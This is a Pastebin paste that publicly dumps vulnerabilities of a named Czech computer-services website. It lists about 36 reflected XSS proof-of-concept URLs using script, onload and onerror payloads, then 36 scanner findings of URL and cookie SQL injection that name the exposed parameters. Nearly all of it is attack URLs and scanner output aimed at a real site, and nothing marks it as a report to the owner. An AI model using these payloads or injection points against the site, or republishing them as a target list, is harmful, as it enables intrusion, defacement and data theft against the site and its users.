Advertisement
sroub3k

tommikula.cz

Aug 26th, 2011
160
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.01 KB | None | 0 0
  1. XSS
  2. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  3.  
  4. http://www.tommikula.cz/themeVariants/"></style><script>alert(9)</script>
  5. http://www.tommikula.cz/components/fotogalerie/thickbox/"><body onload=alert(9)>
  6. http://www.tommikula.cz/js/"><body onload=alert(9)>
  7. http://www.tommikula.cz/themeVariants/roundblocks/_/"><script>alert(9)</script>
  8. http://www.tommikula.cz/themes/Elektrotechnika/"><body onload=alert(9)>
  9. http://www.tommikula.cz/components/fotogalerie/"><iframe onload=alert(9)>
  10. http://www.tommikula.cz/components/"><iframe onload=alert(9)>
  11. http://www.tommikula.cz/themeVariants/roundblocks/'"--></style></script><script>alert(0x0000FC)</script>
  12. http://www.tommikula.cz/"><iframe onload=alert(9)>
  13. http://www.tommikula.cz/vyhodne-pc-balicky'"--></style></script><script>alert(0x000119)</script>
  14. http://www.tommikula.cz/themes/"><body onload=alert(9)>
  15. http://www.tommikula.cz/uzivatelska-podpora'"--></style></script><script>alert(0x000122)</script>
  16. http://www.tommikula.cz/pocitacove-sluzby"><script>alert(9)</script>
  17. http://www.tommikula.cz/themeVariants/tables/"><body onload=alert(9)>
  18. http://www.tommikula.cz/cenik-pc-sluzeb'"--></style></script><script>alert(0x000140)</script>
  19. http://www.tommikula.cz/kontakty'"--></style></script><script>alert(0x000150)</script>
  20. http://www.tommikula.cz/registrace'"--></style></script><script>alert(0x000161)</script>
  21. http://www.tommikula.cz/kontakty?'"--></style></script><script>alert(0x000169)</script>
  22. http://www.tommikula.cz/servis-pocitacu'"--></style></script><script>alert(0x000162)</script>
  23. http://www.tommikula.cz/themeVariants/tables/orange/"><body onload=alert(9)>
  24. http://www.tommikula.cz/registrace?'"--></style></script><script>alert(0x000179)</script>
  25. http://www.tommikula.cz/pocitacova-sit'"--></style></script><script>alert(0x00018C)</script>
  26. http://www.tommikula.cz/pripojeni-k-internetu'"--></style></script><script>alert(0x00019B)</script>
  27. http://www.tommikula.cz/zavirovany-pocitac'"--></style></script><script>alert(0x0001A1)</script>
  28. http://www.tommikula.cz/novy-pocitac'"--></style></script><script>alert(0x00019C)</script>
  29. http://www.tommikula.cz/pocitacova-podpora'"--></style></script><script>alert(0x0001A3)</script>
  30. http://www.tommikula.cz/balicky-sluzeb'"--></style></script><script>alert(0x0001E7)</script>
  31. http://www.tommikula.cz/podpora'"--></style></script><script>alert(0x0001F6)</script>
  32. http://www.tommikula.cz/sitemap'"--></style></script><script>alert(0x000206)</script>
  33. http://www.tommikula.cz/search'"--></style></script><script>alert(0x00021E)</script>
  34. http://www.tommikula.cz/" urlNoQuery[0] "'"--></style></script><script>alert(0x000278)</script>
  35. http://www.tommikula.cz/" url "'"--></style></script><script>alert(0x00029D)</script>
  36. http://www.tommikula.cz/" tb_pathToClose "'"--></style></script><script>alert(0x0002AB)</script>
  37. http://www.tommikula.cz/components/fotogalerie/search'"--></style></script><script>alert(0x000302)</script>
  38. http://www.tommikula.cz/components/fotogalerie/thickbox/search"></script><script>alert(9)</script>
  39. http://www.tommikula.cz/js/search"><object/onerror=alert(9)>
  40.  
  41. SQLi
  42.  
  43. No. 1
  44. ReferURL http://www.tommikula.cz/search^hledat=WCRTESTINPUT000000
  45. Parameter hledat=!S!WCRTESTINPUT000000!E!
  46. Type String
  47. KWordActionURL Vyhledávání
  48. Vulnerability COOKIE SQL INJECTION
  49.  
  50. No. 2
  51. ReferURL http://www.tommikula.cz/cz/?mobile=1
  52. Parameter mobile=1
  53. Type Integer
  54. KWordActionURL klasicky
  55. Vulnerability URL SQL INJECTION
  56.  
  57. No. 3
  58. ReferURL http://www.tommikula.cz/cz/?mobile=99999999
  59. Parameter mobile=99999999
  60. Type Integer
  61. KWordActionURL Uživatelská
  62. Vulnerability URL SQL INJECTION
  63.  
  64. No. 4
  65. ReferURL http://www.tommikula.cz/cenik-pc-sluzeb?mobile=1
  66. Parameter mobile=1
  67. Type Integer
  68. KWordActionURL klasicky
  69. Vulnerability URL SQL INJECTION
  70.  
  71. No. 5
  72. ReferURL http://www.tommikula.cz/cz/pocitacove-sluzby?mobile=0
  73. Parameter mobile=0
  74. Type Integer
  75. KWordActionURL Uživatelská
  76. Vulnerability URL SQL INJECTION
  77.  
  78. No. 6
  79. ReferURL http://www.tommikula.cz/cz/pocitacove-sluzby?mobile=99999999
  80. Parameter mobile=99999999
  81. Type Integer
  82. KWordActionURL klasicky
  83. Vulnerability URL SQL INJECTION
  84.  
  85. No. 7
  86. ReferURL http://www.tommikula.cz/?panel=1&cid=29
  87. Parameter cid=29
  88. Type String
  89. KWordActionURL Uživatelská
  90. Vulnerability URL SQL INJECTION
  91.  
  92. No. 8
  93. ReferURL http://www.tommikula.cz/?panel=1^cid=29
  94. Parameter cid=29
  95. Type Integer
  96. KWordActionURL klasicky
  97. Vulnerability COOKIE SQL INJECTION
  98.  
  99. No. 9
  100. ReferURL http://www.tommikula.cz/?cid=29&panel=1
  101. Parameter panel=1
  102. Type Integer
  103. KWordActionURL klasicky
  104. Vulnerability URL SQL INJECTION
  105.  
  106. No. 10
  107. ReferURL http://www.tommikula.cz/?cid=29^panel=1
  108. Parameter panel=1
  109. Type Integer
  110. KWordActionURL Uživatelská
  111. Vulnerability COOKIE SQL INJECTION
  112.  
  113. No. 11
  114. ReferURL http://www.tommikula.cz/cz/vyhodne-pc-balicky?mobile=0
  115. Parameter mobile=0
  116. Type String
  117. KWordActionURL Uživatelská
  118. Vulnerability URL SQL INJECTION
  119.  
  120. No. 12
  121. ReferURL http://www.tommikula.cz/cz/vyhodne-pc-balicky?mobile=99999999
  122. Parameter mobile=99999999
  123. Type Integer
  124. KWordActionURL Stránka
  125. Vulnerability URL SQL INJECTION
  126.  
  127. No. 13
  128. ReferURL http://www.tommikula.cz/cz/uzivatelska-podpora?mobile=1
  129. Parameter mobile=1
  130. Type Integer
  131. KWordActionURL klasicky
  132. Vulnerability URL SQL INJECTION
  133.  
  134. No. 14
  135. ReferURL http://www.tommikula.cz/kontakty?mobile=1
  136. Parameter mobile=1
  137. Type Integer
  138. KWordActionURL klasicky
  139. Vulnerability URL SQL INJECTION
  140.  
  141. No. 15
  142. ReferURL http://www.tommikula.cz/kontakty^mobile=1
  143. Parameter mobile=1
  144. Type Integer
  145. KWordActionURL jedenáct
  146. Vulnerability COOKIE SQL INJECTION
  147.  
  148. No. 16
  149. ReferURL http://www.tommikula.cz/cz/cenik-pc-sluzeb?mobile=1
  150. Parameter mobile=1
  151. Type Integer
  152. KWordActionURL klasicky
  153. Vulnerability URL SQL INJECTION
  154.  
  155. No. 17
  156. ReferURL http://www.tommikula.cz/cz/kontakty?mobile=0
  157. Parameter mobile=0
  158. Type String
  159. KWordActionURL klasicky
  160. Vulnerability URL SQL INJECTION
  161.  
  162. No. 18
  163. ReferURL http://www.tommikula.cz/cz/kontakty?mobile=99999999
  164. Parameter mobile=99999999
  165. Type Integer
  166. KWordActionURL Uživatelská
  167. Vulnerability URL SQL INJECTION
  168.  
  169. No. 19
  170. ReferURL http://www.tommikula.cz/cz/registrace?mobile=1
  171. Parameter mobile=1
  172. Type Integer
  173. KWordActionURL klasicky
  174. Vulnerability URL SQL INJECTION
  175.  
  176. No. 20
  177. ReferURL http://www.tommikula.cz/cz/registrace?mobile=99999999
  178. Parameter mobile=99999999
  179. Type Integer
  180. KWordActionURL klasicky
  181. Vulnerability URL SQL INJECTION
  182.  
  183. No. 21
  184. ReferURL http://www.tommikula.cz/servis-pocitacu?mobile=1
  185. Parameter mobile=1
  186. Type Integer
  187. KWordActionURL klasicky
  188. Vulnerability URL SQL INJECTION
  189.  
  190. No. 22
  191. ReferURL http://www.tommikula.cz/servis-pocitacu?mobile=99999999
  192. Parameter mobile=99999999
  193. Type Integer
  194. KWordActionURL Uživatelská
  195. Vulnerability URL SQL INJECTION
  196.  
  197. No. 23
  198. ReferURL http://www.tommikula.cz/registrace?mobile=99999999
  199. Parameter mobile=99999999
  200. Type String
  201. KWordActionURL Uživatelská
  202. Vulnerability URL SQL INJECTION
  203.  
  204. No. 24
  205. ReferURL http://www.tommikula.cz/pripojeni-k-internetu?mobile=1
  206. Parameter mobile=1
  207. Type Integer
  208. KWordActionURL Uživatelská
  209. Vulnerability URL SQL INJECTION
  210.  
  211. No. 25
  212. ReferURL http://www.tommikula.cz/pripojeni-k-internetu?mobile=99999999
  213. Parameter mobile=99999999
  214. Type Integer
  215. KWordActionURL klasicky
  216. Vulnerability URL SQL INJECTION
  217.  
  218. No. 26
  219. ReferURL http://www.tommikula.cz/pocitacova-sit?mobile=99999999
  220. Parameter mobile=99999999
  221. Type Integer
  222. KWordActionURL Uživatelská
  223. Vulnerability URL SQL INJECTION
  224.  
  225. No. 27
  226. ReferURL http://www.tommikula.cz/novy-pocitac?mobile=1
  227. Parameter mobile=1
  228. Type Integer
  229. KWordActionURL klasicky
  230. Vulnerability URL SQL INJECTION
  231.  
  232. No. 28
  233. ReferURL http://www.tommikula.cz/balicky-sluzeb?mobile=1
  234. Parameter mobile=1
  235. Type Integer
  236. KWordActionURL klasicky
  237. Vulnerability URL SQL INJECTION
  238.  
  239. No. 29
  240. ReferURL http://www.tommikula.cz/balicky-sluzeb?mobile=99999999
  241. Parameter mobile=99999999
  242. Type Integer
  243. KWordActionURL Uživatelská
  244. Vulnerability URL SQL INJECTION
  245.  
  246. No. 30
  247. ReferURL http://www.tommikula.cz/zavirovany-pocitac?mobile=0
  248. Parameter mobile=0
  249. Type String
  250. KWordActionURL klasicky
  251. Vulnerability URL SQL INJECTION
  252.  
  253. No. 31
  254. ReferURL http://www.tommikula.cz/podpora?mobile=1
  255. Parameter mobile=1
  256. Type Integer
  257. KWordActionURL klasicky
  258. Vulnerability URL SQL INJECTION
  259.  
  260. No. 32
  261. ReferURL http://www.tommikula.cz/podpora?mobile=99999999
  262. Parameter mobile=99999999
  263. Type Integer
  264. KWordActionURL Uživatelská
  265. Vulnerability URL SQL INJECTION
  266.  
  267. No. 33
  268. ReferURL http://www.tommikula.cz/pocitacova-podpora?mobile=99999999
  269. Parameter mobile=99999999
  270. Type String
  271. KWordActionURL Uživatelská
  272. Vulnerability URL SQL INJECTION
  273.  
  274. No. 34
  275. ReferURL http://www.tommikula.cz/sitemap?mobile=0
  276. Parameter mobile=0
  277. Type String
  278. KWordActionURL všestranná
  279. Vulnerability URL SQL INJECTION
  280.  
  281. No. 35
  282. ReferURL http://www.tommikula.cz/sitemap?mobile=99999999
  283. Parameter mobile=99999999
  284. Type Integer
  285. KWordActionURL klasicky
  286. Vulnerability URL SQL INJECTION
  287.  
  288. No. 36
  289. ReferURL http://www.tommikula.cz/js/?mobile=99999999
  290. Parameter mobile=99999999
  291. Type String
  292. KWordActionURL Uživatelská
  293. Vulnerability URL SQL INJECTION
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement